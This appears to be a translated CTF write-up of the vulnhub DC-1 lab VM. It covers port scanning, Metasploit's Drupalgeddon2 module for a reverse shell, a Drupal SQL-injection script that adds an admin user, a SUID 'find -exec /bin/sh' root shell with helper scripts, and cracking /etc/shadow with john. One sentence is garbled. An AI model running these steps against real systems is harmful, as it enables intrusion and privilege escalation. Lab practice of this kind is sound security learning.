Linux Target Machine CTF Notes | DC-1
Introduction: For a while I have only been going through the motions and stopped updating the blog. I want to keep learning and keep updating, and I hope we can learn and make progress together over the winter vacation!
0X01 Main Points
- Privilege escalation through the find command when it carries the SUID bit
- Obtaining /etc/passwd and /etc/shadow (if both can be read, the hashes can be cracked with john)
- Understanding searchsploit and getting comfortable with the msf framework
- The shell msf hands back may show no output; python's pty module turns it into a usable interactive shell
0X02 Walkthrough
The target is the DC-1 Linux VM from vulnhub. After loading the image, the VM shows a login prompt for an account and password, so it is meant to be attacked as a server. The first step is therefore to find the target's IP address from the attacking machine.
Once the target is known to be 172.20.10.9, sniff its ports with nmap: nmap -p- -sV 172.20.10.9. The -p- option scans all 65535 ports instead of nmap's default list. The -sV option enables version detection, which identifies the software and version running behind each open port. Unlike the other scan types it does not discover open ports itself: nmap first finds the open ports (by default with a TCP SYN scan) and only then sends probes to those ports to work out what software and version answers. The scan reports ports 22, 80, 111 and 32850 open. Port 80 is HTTP and port 22 is SSH.
The site on port 80 turns out to run Drupal, an open-source content management framework written in PHP, so start msf!
The module used here is the one for the Drupal vulnerability published in 2018 (exploit/unix/webapp/drupal_drupalgeddon2, CVE-2018-7600); it is ranked Excellent and gives a reverse shell.
Note: after selecting a module, run show options and look at every option marked Required. All of them must be set before the final exploit command will do anything.
Here only rhost needs a value: set rhost 172.20.10.9. With that set, exploit returns the reverse shell.
That gets us in. Listing the web root turns up flag1.
Its hint says, roughly, that every site has a log and this one is no exception, so we go looking through log and configuration files. The web root contains a web.config, which turns out to be useless, so we keep looking. There is also a CHANGELOG.txt, but we are not allowed to open it; that presumably needs higher privileges. Looking for other PHP configuration files we find Drupal's settings.php (sites/default/settings.php), which contains:
flag2 together with the database user name and password. The natural next idea is to log in to the database and look for the site's user names and passwords,
then use them to log in to the web site on port 80 and see what is inside.
Running the mysql client inside the msf shell gives no output, however: the shell is not interactive, so mysql cannot be used from it. This is where python's pty module comes in.
Checking the version shows Python 2.7.13, so we use that module to spawn an interactive shell.
The shell runs as www-data. On Debian/Ubuntu, www-data is the default user and group that web services run as; it is normally created by apt when the web server package is installed.
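The interactive-shell upgrade described above, as an added example that is not part of the original writeup. It picks whichever Python the target provides, builds the pty.spawn one-liner, and documents the follow-up stty steps that make the shell fully usable; the function names are mine.

```shell
#!/bin/sh
# Added example (not from the original writeup): upgrade a non-interactive
# reverse shell (such as the one msf hands back) to a real TTY so that
# programs like mysql, su and sudo that expect a terminal will work.

# Pick whichever Python interpreter the target has. Python 2 and 3 both
# ship the pty module, so the spawn command is the same for either.
find_python() {
    for p in python python2 python3; do
        if command -v "$p" >/dev/null 2>&1; then
            echo "$p"
            return 0
        fi
    done
    return 1
}

# The one-liner to type into the dumb shell. It is returned as a string
# so it can be inspected or pasted; run it with: eval "$(pty_cmd)"
pty_cmd() {
    py=$(find_python) || return 1
    echo "$py -c 'import pty; pty.spawn(\"/bin/bash\")'"
}

# Full sequence, written as comments because the remaining steps are
# typed interactively in the attacker's terminal rather than scripted:
#   1. In the dumb shell:          eval "$(pty_cmd)"
#   2. Background the shell:       Ctrl-Z
#   3. In the local terminal:      stty raw -echo; fg
#   4. Back in the target shell:   export TERM=xterm; stty rows 50 cols 200
# After step 3, arrow keys, tab completion and Ctrl-C behave normally and
# the shell no longer swallows the output of programs like mysql.
```

Step 3 matters as much as the spawn itself: without stty raw -echo, Ctrl-C kills the listener instead of the remote program.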
Now log in to MySQL using the database name, user name and password collected from settings.php.
After following the operation on conventional database look, look-up table, field investigation found that the following user and password, but the password is encrypted obviously, a very personal feeling burst through fees, but in fact read other bigwigs of the articles found with John the Ripper is relatively easy to get, but I did not succeed kali 2019 download good, so this period I can only practice the physical machine.
See two User, admin
and Fred
Next, run searchsploit to see which published Drupal exploits could apply. To pick a script that actually fits we need the exact version, so we walk the site's directories and find includes/bootstrap.inc,
which declares the core version.
It is Drupal 7.24. Now look at the Drupal scripts
that searchsploit lists.
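An added example (mine, not from the writeup) of fingerprinting the Drupal core version from bootstrap.inc so the searchsploit query can be narrowed. Drupal 7 declares its version with define('VERSION', '7.24'); in includes/bootstrap.inc; the sample file below is a constructed stand-in for that line so the script runs offline, and the function names are mine.

```shell
#!/bin/sh
# Added example (not from the original writeup): read the Drupal core
# version out of bootstrap.inc and use it to target the exploit search.

# Constructed stand-in for includes/bootstrap.inc: only the version
# define and one neighbouring line are reproduced.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
<?php
/**
 * The current system version.
 */
define('VERSION', '7.24');
define('DRUPAL_CORE_COMPATIBILITY', '7.x');
EOF

# Print only the version string, e.g. 7.24. Works on a real
# /var/www/includes/bootstrap.inc just as well as on the sample.
drupal_version() {
    sed -n "s/^define('VERSION', *'\([^']*\)');.*/\1/p" "$1"
}

# Major version only (7), which is what the searchsploit query needs.
drupal_major() {
    drupal_version "$1" | cut -d. -f1
}

v=$(drupal_version "$SAMPLE")
echo "Drupal core version: $v"

# With the version known, narrow the search instead of paging through
# every Drupal entry (run on the attacking machine, which has exploitdb):
#   searchsploit "drupal $(drupal_major "$SAMPLE")"
#   searchsploit -m 34992      # copy the chosen script into the cwd
#   cat 34992.py               # read which parameters it wants
rm -f "$SAMPLE"
```

The same grep works against a live site when the file is world-readable, but here we already have a shell, so reading it locally is simpler and leaves no request in the web log.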
Because of the screenshot, the purpose of each script is not fully visible (the titles are truncated in the listing); the one chosen here is 34992.py. cat
the script to see which parameters it needs, then call it directly with those parameters.
This script uses the Drupal SQL injection to add a new user with administrator privileges. Checking the users table in mysql again shows the new account:
Username: crispr, Password: 123456. Logging in to the site with it gives flag3.
Privilege escalation
- Log in as root (brute-forcing the root password did not succeed)
- Log in as an ordinary user and get a root shell through the find command, which has the SUID bit set
SUID bit: a file carrying it executes with the privileges of its owner (here root) no matter which user runs it.
The key words here are find,
-perm,
and -exec.
Using find:
because the find binary has the SUID bit, everything it does while running, including the command given to -exec, happens with root privileges. That lets us read /etc/passwd and, more importantly, /etc/shadow, which stores every user's password hash. With /etc/passwd and /etc/shadow both in hand, the real passwords can be recovered by cracking (john's unshadow merges the two files into its input format), and then the root account can be used over SSH to get the flag.
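An added example (mine, not from the writeup) of the enumeration a pentester does before reaching for this trick: list every SUID file, check whether find is one of them, and only then use -exec. The /tmp/getshell path and the function names are my choices; the writeup's own transcript follows below.

```shell
#!/bin/sh
# Added example (not from the original writeup): find SUID binaries and,
# when find itself is one of them, turn it into a root shell.

# Every file with the set-uid bit (mode 4000). Errors from unreadable
# directories are discarded. On DC-1 this list includes /usr/bin/find,
# which is what makes the -exec trick work.
list_suid() {
    find / -perm -4000 -type f 2>/dev/null
}

# Return 0 if the given path carries the SUID bit, 1 otherwise.
is_suid() {
    [ -u "$1" ]
}

# Resolve the find binary on PATH and report whether it is SUID.
find_is_suid() {
    f=$(command -v find) || return 1
    is_suid "$f"
}

# Root shell via SUID find. -exec runs the command once per matched
# file, so matching a file we just created guarantees exactly one run.
# /bin/sh is used rather than bash on purpose: bash drops the effective
# uid back to the real uid unless started with -p, while dash (Debian's
# /bin/sh) keeps the elevated uid.
suid_find_shell() {
    find_is_suid || { echo "find is not SUID here" >&2; return 1; }
    touch /tmp/getshell                       # hypothetical marker file
    find /tmp -type f -name getshell -exec /bin/sh \;
}

# Once root, the hashes are readable and can be cracked offline:
#   cat /etc/passwd /etc/shadow              # copy both to the attacker
#   unshadow passwd shadow > hashes.txt
#   john hashes.txt
```

Running list_suid first, rather than assuming find, is the habit worth keeping: on another box the SUID binary that gives the shell may be a different one.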
flag4@DC-1:~$ touch getshell
flag4@DC-1:~$ find / -type f -name getshell -exec "whoami" \;
root
flag4@DC-1:~$ find / -type f -name getshell -exec "/bin/sh" \;
cd /root
ls
thefinalflag.txt
cat thefinalflag.txt
First touch creates a new, empty file named getshell, then find is told to search for it. Because find carries the SUID bit, the command it runs through -exec
executes with root
privileges: whoami reports root, and
/bin/sh gives a root shell from which /root/thefinalflag.txt can be read.
A shell script usually begins with a line that declares which sh interpreter should run it.
Two forms are common in today's scripts:
(1) #!/bin/sh
(2) #!/bin/bash
Note: every script starts with "#!". "#!" is actually a two-byte magic number, a special marker that identifies a file type; here it marks an executable script. "#!" is followed by a path name,
which names the program that will interpret the script's commands. That program can be a shell, a language interpreter, or any
other ordinary program.
sh is a special mode of bash, that is, /bin/sh behaves like /bin/bash --posix: plainly put,
sh is bash with the POSIX standard switched on.
On Linux systems such as Red Hat, running a script with sh therefore amounts to running it in
bash's POSIX mode.
That equivalence only holds where /bin/sh is a link to bash. On Debian and Ubuntu, the family DC-1 belongs to, /bin/sh is dash, a smaller POSIX shell. For the escalation above this is exactly what we want: bash started with an effective uid of 0 drops back to the real uid unless it is run with -p, whereas dash keeps it, so -exec "/bin/sh" from SUID find yields a root shell directly.
Get the final flag!